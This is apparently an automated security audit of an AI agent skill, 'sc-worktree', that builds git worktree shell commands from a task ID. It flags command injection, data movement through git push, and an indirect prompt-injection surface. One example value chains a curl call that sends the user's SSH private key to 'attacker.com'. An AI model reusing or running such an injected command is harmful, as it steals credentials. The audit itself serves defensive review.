sc-worktree
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH (COMMAND_EXECUTION, DATA_EXFILTRATION)
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill constructs and executes shell commands using the `<task-id>` parameter, specifically `mkdir -p .worktrees/<task-id>` and `git worktree add -b wt/<task-id> .worktrees/<task-id>`. Without explicit sanitization, a malicious task ID containing shell metacharacters (e.g., `feature; curl http://attacker.com/$(cat ~/.ssh/id_rsa)`) would lead to arbitrary command execution on the host system.
- DATA_EXFILTRATION (LOW): The `propose` command utilizes `git push` and `gh pr create` to send local branch data to remote repositories on GitHub. While this is the intended functionality, it establishes a network-based data movement path. Since it targets a trusted domain (github.com), it is classified as LOW severity per the [TRUST-SCOPE-RULE].
- INDIRECT_PROMPT_INJECTION (LOW): The skill possesses a vulnerable surface for indirect injection.
  1. Ingestion points: The `<task-id>` and `--base` flags in `SKILL.md`.
  2. Boundary markers: Absent; there are no delimiters or instructions to ignore embedded commands.
  3. Capability inventory: Subprocess execution of `mkdir`, `git`, and `gh` across all operations.
  4. Sanitization: Absent; the instructions do not specify any validation or escaping of the user-provided strings before shell interpolation.
Recommendations
- AI detected serious security threats